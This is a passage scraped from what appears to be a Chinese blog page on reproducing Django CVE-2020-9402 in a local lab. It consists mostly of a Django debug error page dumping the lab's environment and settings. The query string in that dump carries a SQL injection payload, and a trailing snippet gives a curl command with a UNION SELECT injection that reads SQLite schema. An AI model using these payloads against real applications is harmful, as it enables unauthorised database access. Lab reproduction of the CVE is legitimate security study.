class="code"><pre>'rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:'</pre></td> </tr> <tr> <td>MAIL</td> <td class="code"><pre>'/var/mail/root'</pre></td> </tr> <tr> <td>OLDPWD</td> <td class="code"><pre>'/root/vulhub/django/CVE-2020-9402/src'</pre></td> </tr> <tr> <td>PATH</td> <td class="code"><pre>'/xp/server/docker:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin:/xp/server/docker'</pre></td> </tr> <tr> <td>PATH_INFO</td> <td class="code"><pre>'/'</pre></td> </tr> <tr> <td>PWD</td> <td class="code"><pre>'/root/django_cve_2020_9402'</pre></td> </tr> <tr> <td>QUERY_STRING</td> <td class="code"><pre>'geom=SRID=4326;SELECT%20version();--'</pre></td> </tr> <tr> <td>REMOTE_ADDR</td> <td class="code"><pre>'192.168.20.128'</pre></td> </tr> <tr> <td>REMOTE_HOST</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>REQUEST_METHOD</td> <td class="code"><pre>'GET'</pre></td> </tr> <tr> <td>RUN_MAIN</td> <td class="code"><pre>'true'</pre></td> </tr> <tr> <td>SCRIPT_NAME</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>SERVER_NAME</td> <td class="code"><pre>'zzz-virtual-machine'</pre></td> </tr> <tr> <td>SERVER_PORT</td> <td class="code"><pre>'8000'</pre></td> </tr> <tr> <td>SERVER_PROTOCOL</td> <td class="code"><pre>'HTTP/1.1'</pre></td> </tr> <tr> <td>SERVER_SOFTWARE</td> <td class="code"><pre>'WSGIServer/0.2'</pre></td> </tr> <tr> <td>SHELL</td> <td class="code"><pre>'/bin/bash'</pre></td> </tr> <tr> <td>SHLVL</td> <td class="code"><pre>'1'</pre></td> </tr> <tr> <td>SUDO_COMMAND</td> <td class="code"><pre>'/bin/bash'</pre></td> </tr> <tr> <td>SUDO_GID</td> <td class="code"><pre>'1000'</pre></td> </tr> <tr> <td>SUDO_UID</td> <td class="code"><pre>'1000'</pre></td> </tr> <tr> <td>SUDO_USER</td> <td class="code"><pre>'zzz'</pre></td> </tr> <tr> <td>TERM</td> <td class="code"><pre>'xterm-256color'</pre></td> </tr> <tr> <td>TZ</td> <td class="code"><pre>'UTC'</pre></td> </tr> <tr> <td>USER</td> <td class="code"><pre>'root'</pre></td> </tr> <tr> <td>XAUTHORITY</td> <td class="code"><pre>'/run/user/1000/.mutter-Xwaylandauth.T2BDG3'</pre></td> </tr> <tr> <td>XDG_CURRENT_DESKTOP</td> <td class="code"><pre>'ubuntu:GNOME'</pre></td> </tr> <tr> <td>XDG_DATA_DIRS</td> <td class="code"><pre>'/usr/share/gnome:/usr/local/share:/usr/share:/var/lib/snapd/desktop'</pre></td> </tr> <tr> <td>_</td> <td class="code"><pre>'/usr/bin/python3'</pre></td> </tr> <tr> <td>wsgi.errors</td> <td class="code"><pre><_io.TextIOWrapper name='<stderr>' mode='w' encoding='utf-8'></pre></td> </tr> <tr> <td>wsgi.file_wrapper</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>wsgi.input</td> <td class="code"><pre><django.core.handlers.wsgi.LimitedStream object at 0x7eb69366d930></pre></td> </tr> <tr> <td>wsgi.multiprocess</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>wsgi.multithread</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>wsgi.run_once</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>wsgi.url_scheme</td> <td class="code"><pre>'http'</pre></td> </tr> <tr> <td>wsgi.version</td> <td class="code"><pre>(1, 0)</pre></td> </tr> </tbody> </table> <h3 id="settings-info">Settings</h3> <h4>Using settings module <code>vuln.settings</code></h4> <table class="req"> <thead> <tr> <th>Setting</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>ABSOLUTE_URL_OVERRIDES</td> <td class="code"><pre>{}</pre></td> </tr> <tr> <td>ADMINS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>ALLOWED_HOSTS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>APPEND_SLASH</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>AUTHENTICATION_BACKENDS</td> <td class="code"><pre>['django.contrib.auth.backends.ModelBackend']</pre></td> </tr> <tr> <td>AUTH_PASSWORD_VALIDATORS</td> <td class="code"><pre>'********************'</pre></td> </tr> <tr> <td>AUTH_USER_MODEL</td> <td class="code"><pre>'auth.User'</pre></td> </tr> <tr> <td>BASE_DIR</td> <td class="code"><pre>'/root/django_cve_2020_9402'</pre></td> </tr> <tr> <td>CACHES</td> <td class="code"><pre>{'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'}}</pre></td> </tr> <tr> <td>CACHE_MIDDLEWARE_ALIAS</td> <td class="code"><pre>'default'</pre></td> </tr> <tr> <td>CACHE_MIDDLEWARE_KEY_PREFIX</td> <td class="code"><pre>'********************'</pre></td> </tr> <tr> <td>CACHE_MIDDLEWARE_SECONDS</td> <td class="code"><pre>600</pre></td> </tr> <tr> <td>CSRF_COOKIE_AGE</td> <td class="code"><pre>31449600</pre></td> </tr> <tr> <td>CSRF_COOKIE_DOMAIN</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>CSRF_COOKIE_HTTPONLY</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>CSRF_COOKIE_NAME</td> <td class="code"><pre>'csrftoken'</pre></td> </tr> <tr> <td>CSRF_COOKIE_PATH</td> <td class="code"><pre>'/'</pre></td> </tr> <tr> <td>CSRF_COOKIE_SAMESITE</td> <td class="code"><pre>'Lax'</pre></td> </tr> <tr> <td>CSRF_COOKIE_SECURE</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>CSRF_FAILURE_VIEW</td> <td class="code"><pre>'django.views.csrf.csrf_failure'</pre></td> </tr> <tr> <td>CSRF_HEADER_NAME</td> <td class="code"><pre>'HTTP_X_CSRFTOKEN'</pre></td> </tr> <tr> <td>CSRF_TRUSTED_ORIGINS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>CSRF_USE_SESSIONS</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>DATABASES</td> <td class="code"><pre>{'default': {'ATOMIC_REQUESTS': False, 'AUTOCOMMIT': True, 'CONN_MAX_AGE': 0, 'ENGINE': 'django.db.backends.sqlite3', 'HOST': '', 'NAME': '/root/django_cve_2020_9402/db.sqlite3', 'OPTIONS': {}, 'PASSWORD': '********************', 'PORT': '', 'TEST': {'CHARSET': None, 'COLLATION': None, 'MIRROR': None, 'NAME': None}, 'TIME_ZONE': None, 'USER': ''}}</pre></td> </tr> <tr> <td>DATABASE_ROUTERS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>DATA_UPLOAD_MAX_MEMORY_SIZE</td> <td class="code"><pre>2621440</pre></td> </tr> <tr> <td>DATA_UPLOAD_MAX_NUMBER_FIELDS</td> <td class="code"><pre>1000</pre></td> </tr> <tr> <td>DATETIME_FORMAT</td> <td class="code"><pre>'N j, Y, P'</pre></td> </tr> <tr> <td>DATETIME_INPUT_FORMATS</td> <td class="code"><pre>['%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M:%S.%f', '%Y-%m-%d %H:%M', '%Y-%m-%d', '%m/%d/%Y %H:%M:%S', '%m/%d/%Y %H:%M:%S.%f', '%m/%d/%Y %H:%M', '%m/%d/%Y', '%m/%d/%y %H:%M:%S', '%m/%d/%y %H:%M:%S.%f', '%m/%d/%y %H:%M', '%m/%d/%y']</pre></td> </tr> <tr> <td>DATE_FORMAT</td> <td class="code"><pre>'N j, Y'</pre></td> </tr> <tr> <td>DATE_INPUT_FORMATS</td> <td class="code"><pre>['%Y-%m-%d', '%m/%d/%Y', '%m/%d/%y', '%b %d %Y', '%b %d, %Y', '%d %b %Y', '%d %b, %Y', '%B %d %Y', '%B %d, %Y', '%d %B %Y', '%d %B, %Y']</pre></td> </tr> <tr> <td>DEBUG</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>DEBUG_PROPAGATE_EXCEPTIONS</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>DECIMAL_SEPARATOR</td> <td class="code"><pre>'.'</pre></td> </tr> <tr> <td>DEFAULT_CHARSET</td> <td class="code"><pre>'utf-8'</pre></td> </tr> <tr> <td>DEFAULT_EXCEPTION_REPORTER_FILTER</td> <td class="code"><pre>'django.views.debug.SafeExceptionReporterFilter'</pre></td> </tr> <tr> <td>DEFAULT_FILE_STORAGE</td> <td class="code"><pre>'django.core.files.storage.FileSystemStorage'</pre></td> </tr> <tr> <td>DEFAULT_FROM_EMAIL</td> <td class="code"><pre>'webmaster@localhost'</pre></td> </tr> <tr> <td>DEFAULT_INDEX_TABLESPACE</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>DEFAULT_TABLESPACE</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>DISALLOWED_USER_AGENTS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>EMAIL_BACKEND</td> <td class="code"><pre>'django.core.mail.backends.smtp.EmailBackend'</pre></td> </tr> <tr> <td>EMAIL_HOST</td> <td class="code"><pre>'localhost'</pre></td> </tr> <tr> <td>EMAIL_HOST_PASSWORD</td> <td class="code"><pre>'********************'</pre></td> </tr> <tr> <td>EMAIL_HOST_USER</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>EMAIL_PORT</td> <td class="code"><pre>25</pre></td> </tr> <tr> <td>EMAIL_SSL_CERTFILE</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>EMAIL_SSL_KEYFILE</td> <td class="code"><pre>'********************'</pre></td> </tr> <tr> <td>EMAIL_SUBJECT_PREFIX</td> <td class="code"><pre>'[Django] '</pre></td> </tr> <tr> <td>EMAIL_TIMEOUT</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>EMAIL_USE_LOCALTIME</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>EMAIL_USE_SSL</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>EMAIL_USE_TLS</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>FILE_CHARSET</td> <td class="code"><pre>'utf-8'</pre></td> </tr> <tr> <td>FILE_UPLOAD_DIRECTORY_PERMISSIONS</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>FILE_UPLOAD_HANDLERS</td> <td class="code"><pre>['django.core.files.uploadhandler.MemoryFileUploadHandler', 'django.core.files.uploadhandler.TemporaryFileUploadHandler']</pre></td> </tr> <tr> <td>FILE_UPLOAD_MAX_MEMORY_SIZE</td> <td class="code"><pre>2621440</pre></td> </tr> <tr> <td>FILE_UPLOAD_PERMISSIONS</td> <td class="code"><pre>420</pre></td> </tr> <tr> <td>FILE_UPLOAD_TEMP_DIR</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>FIRST_DAY_OF_WEEK</td> <td class="code"><pre>0</pre></td> </tr> <tr> <td>FIXTURE_DIRS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>FORCE_SCRIPT_NAME</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>FORMAT_MODULE_PATH</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>FORM_RENDERER</td> <td class="code"><pre>'django.forms.renderers.DjangoTemplates'</pre></td> </tr> <tr> <td>IGNORABLE_404_URLS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>INSTALLED_APPS</td> <td class="code"><pre>['django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'app']</pre></td> </tr> <tr> <td>INTERNAL_IPS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>LANGUAGES</td> <td class="code"><pre>[('af', 'Afrikaans'), ('ar', 'Arabic'), ('ast', 'Asturian'), ('az', 'Azerbaijani'), ('bg', 'Bulgarian'), ('be', 'Belarusian'), ('bn', 'Bengali'), ('br', 'Breton'), ('bs', 'Bosnian'), ('ca', 'Catalan'), ('cs', 'Czech'), ('cy', 'Welsh'), ('da', 'Danish'), ('de', 'German'), ('dsb', 'Lower Sorbian'), ('el', 'Greek'), ('en', 'English'), ('en-au', 'Australian English'), ('en-gb', 'British English'), ('eo', 'Esperanto'), ('es', 'Spanish'), ('es-ar', 'Argentinian Spanish'), ('es-co', 'Colombian Spanish'), ('es-mx', 'Mexican Spanish'), ('es-ni', 'Nicaraguan Spanish'), ('es-ve', 'Venezuelan Spanish'), ('et', 'Estonian'), ('eu', 'Basque'), ('fa', 'Persian'), ('fi', 'Finnish'), ('fr', 'French'), ('fy', 'Frisian'), ('ga', 'Irish'), ('gd', 'Scottish Gaelic'), ('gl', 'Galician'), ('he', 'Hebrew'), ('hi', 'Hindi'), ('hr', 'Croatian'), ('hsb', 'Upper Sorbian'), ('hu', 'Hungarian'), ('hy', 'Armenian'), ('ia', 'Interlingua'), ('id', 'Indonesian'), ('io', 'Ido'), ('is', 'Icelandic'), ('it', 'Italian'), ('ja', 'Japanese'), ('ka', 'Georgian'), ('kab', 'Kabyle'), ('kk', 'Kazakh'), ('km', 'Khmer'), ('kn', 'Kannada'), ('ko', 'Korean'), ('lb', 'Luxembourgish'), ('lt', 'Lithuanian'), ('lv', 'Latvian'), ('mk', 'Macedonian'), ('ml', 'Malayalam'), ('mn', 'Mongolian'), ('mr', 'Marathi'), ('my', 'Burmese'), ('nb', 'Norwegian Bokmål'), ('ne', 'Nepali'), ('nl', 'Dutch'), ('nn', 'Norwegian Nynorsk'), ('os', 'Ossetic'), ('pa', 'Punjabi'), ('pl', 'Polish'), ('pt', 'Portuguese'), ('pt-br', 'Brazilian Portuguese'), ('ro', 'Romanian'), ('ru', 'Russian'), ('sk', 'Slovak'), ('sl', 'Slovenian'), ('sq', 'Albanian'), ('sr', 'Serbian'), ('sr-latn', 'Serbian Latin'), ('sv', 'Swedish'), ('sw', 'Swahili'), ('ta', 'Tamil'), ('te', 'Telugu'), ('th', 'Thai'), ('tr', 'Turkish'), ('tt', 'Tatar'), ('udm', 'Udmurt'), ('uk', 'Ukrainian'), ('ur', 'Urdu'), ('uz', 'Uzbek'), ('vi', 'Vietnamese'), ('zh-hans', 'Simplified Chinese'), ('zh-hant', 'Traditional Chinese')]</pre></td> </tr> <tr> <td>LANGUAGES_BIDI</td> <td class="code"><pre>['he', 'ar', 'fa', 'ur']</pre></td> </tr> <tr> <td>LANGUAGE_CODE</td> <td class="code"><pre>'en-us'</pre></td> </tr> <tr> <td>LANGUAGE_COOKIE_AGE</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>LANGUAGE_COOKIE_DOMAIN</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>LANGUAGE_COOKIE_HTTPONLY</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>LANGUAGE_COOKIE_NAME</td> <td class="code"><pre>'django_language'</pre></td> </tr> <tr> <td>LANGUAGE_COOKIE_PATH</td> <td class="code"><pre>'/'</pre></td> </tr> <tr> <td>LANGUAGE_COOKIE_SAMESITE</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>LANGUAGE_COOKIE_SECURE</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>LOCALE_PATHS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>LOGGING</td> <td class="code"><pre>{}</pre></td> </tr> <tr> <td>LOGGING_CONFIG</td> <td class="code"><pre>'logging.config.dictConfig'</pre></td> </tr> <tr> <td>LOGIN_REDIRECT_URL</td> <td class="code"><pre>'/accounts/profile/'</pre></td> </tr> <tr> <td>LOGIN_URL</td> <td class="code"><pre>'/accounts/login/'</pre></td> </tr> <tr> <td>LOGOUT_REDIRECT_URL</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>MANAGERS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>MEDIA_ROOT</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>MEDIA_URL</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>MESSAGE_STORAGE</td> <td class="code"><pre>'django.contrib.messages.storage.fallback.FallbackStorage'</pre></td> </tr> <tr> <td>MIDDLEWARE</td> <td class="code"><pre>['django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware']</pre></td> </tr> <tr> <td>MIGRATION_MODULES</td> <td class="code"><pre>{}</pre></td> </tr> <tr> <td>MONTH_DAY_FORMAT</td> <td class="code"><pre>'F j'</pre></td> </tr> <tr> <td>NUMBER_GROUPING</td> <td class="code"><pre>0</pre></td> </tr> <tr> <td>PASSWORD_HASHERS</td> <td class="code"><pre>'********************'</pre></td> </tr> <tr> <td>PASSWORD_RESET_TIMEOUT_DAYS</td> <td class="code"><pre>'********************'</pre></td> </tr> <tr> <td>PREPEND_WWW</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>ROOT_URLCONF</td> <td class="code"><pre>'vuln.urls'</pre></td> </tr> <tr> <td>SECRET_KEY</td> <td class="code"><pre>'********************'</pre></td> </tr> <tr> <td>SECURE_BROWSER_XSS_FILTER</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>SECURE_CONTENT_TYPE_NOSNIFF</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>SECURE_HSTS_INCLUDE_SUBDOMAINS</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>SECURE_HSTS_PRELOAD</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>SECURE_HSTS_SECONDS</td> <td class="code"><pre>0</pre></td> </tr> <tr> <td>SECURE_PROXY_SSL_HEADER</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>SECURE_REDIRECT_EXEMPT</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>SECURE_REFERRER_POLICY</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>SECURE_SSL_HOST</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>SECURE_SSL_REDIRECT</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>SERVER_EMAIL</td> <td class="code"><pre>'root@localhost'</pre></td> </tr> <tr> <td>SESSION_CACHE_ALIAS</td> <td class="code"><pre>'default'</pre></td> </tr> <tr> <td>SESSION_COOKIE_AGE</td> <td class="code"><pre>1209600</pre></td> </tr> <tr> <td>SESSION_COOKIE_DOMAIN</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>SESSION_COOKIE_HTTPONLY</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>SESSION_COOKIE_NAME</td> <td class="code"><pre>'sessionid'</pre></td> </tr> <tr> <td>SESSION_COOKIE_PATH</td> <td class="code"><pre>'/'</pre></td> </tr> <tr> <td>SESSION_COOKIE_SAMESITE</td> <td class="code"><pre>'Lax'</pre></td> </tr> <tr> <td>SESSION_COOKIE_SECURE</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>SESSION_ENGINE</td> <td class="code"><pre>'django.contrib.sessions.backends.db'</pre></td> </tr> <tr> <td>SESSION_EXPIRE_AT_BROWSER_CLOSE</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>SESSION_FILE_PATH</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>SESSION_SAVE_EVERY_REQUEST</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>SESSION_SERIALIZER</td> <td class="code"><pre>'django.contrib.sessions.serializers.JSONSerializer'</pre></td> </tr> <tr> <td>SETTINGS_MODULE</td> <td class="code"><pre>'vuln.settings'</pre></td> </tr> <tr> <td>SHORT_DATETIME_FORMAT</td> <td class="code"><pre>'m/d/Y P'</pre></td> </tr> <tr> <td>SHORT_DATE_FORMAT</td> <td class="code"><pre>'m/d/Y'</pre></td> </tr> <tr> <td>SIGNING_BACKEND</td> <td class="code"><pre>'django.core.signing.TimestampSigner'</pre></td> </tr> <tr> <td>SILENCED_SYSTEM_CHECKS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>STATICFILES_DIRS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>STATICFILES_FINDERS</td> <td class="code"><pre>['django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder']</pre></td> </tr> <tr> <td>STATICFILES_STORAGE</td> <td class="code"><pre>'django.contrib.staticfiles.storage.StaticFilesStorage'</pre></td> </tr> <tr> <td>STATIC_ROOT</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>STATIC_URL</td> <td class="code"><pre>'/static/'</pre></td> </tr> <tr> <td>TEMPLATES</td> <td class="code"><pre>[{'APP_DIRS': True, 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'OPTIONS': {'context_processors': ['django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages']}}]</pre></td> </tr> <tr> <td>TEST_NON_SERIALIZED_APPS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>TEST_RUNNER</td> <td class="code"><pre>'django.test.runner.DiscoverRunner'</pre></td> </tr> <tr> <td>THOUSAND_SEPARATOR</td> <td class="code"><pre>','</pre></td> </tr> <tr> <td>TIME_FORMAT</td> <td class="code"><pre>'P'</pre></td> </tr> <tr> <td>TIME_INPUT_FORMATS</td> <td class="code"><pre>['%H:%M:%S', '%H:%M:%S.%f', '%H:%M']</pre></td> </tr> <tr> <td>TIME_ZONE</td> <td class="code"><pre>'UTC'</pre></td> </tr> <tr> <td>USE_I18N</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>USE_L10N</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>USE_THOUSAND_SEPARATOR</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>USE_TZ</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>USE_X_FORWARDED_HOST</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>USE_X_FORWARDED_PORT</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>WSGI_APPLICATION</td> <td class="code"><pre>'vuln.wsgi.application'</pre></td> </tr> <tr> <td>X_FRAME_OPTIONS</td> <td class="code"><pre>'DENY'</pre></td> </tr> <tr> <td>YEAR_MONTH_FORMAT</td> <td class="code"><pre>'F Y'</pre></td> </tr> </tbody> </table> </div> <div id="explanation"> <p> You're seeing this error because you have <code>DEBUG = True</code> in your Django settings file. Change that to <code>False</code>, and Django will display a standard page generated by the handler for this status code. </p> </div> </body> </html>
12-01
curl -H "Host: localhost" "http://192.168.20.128:8000/?id=1%27%20union%20select%20sql,%27x%27%20from%20sqlite_master%20where%20name=%27app_userinfo%27--" ``` --- ## ️ 修复建议(开发者视角) 不要...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值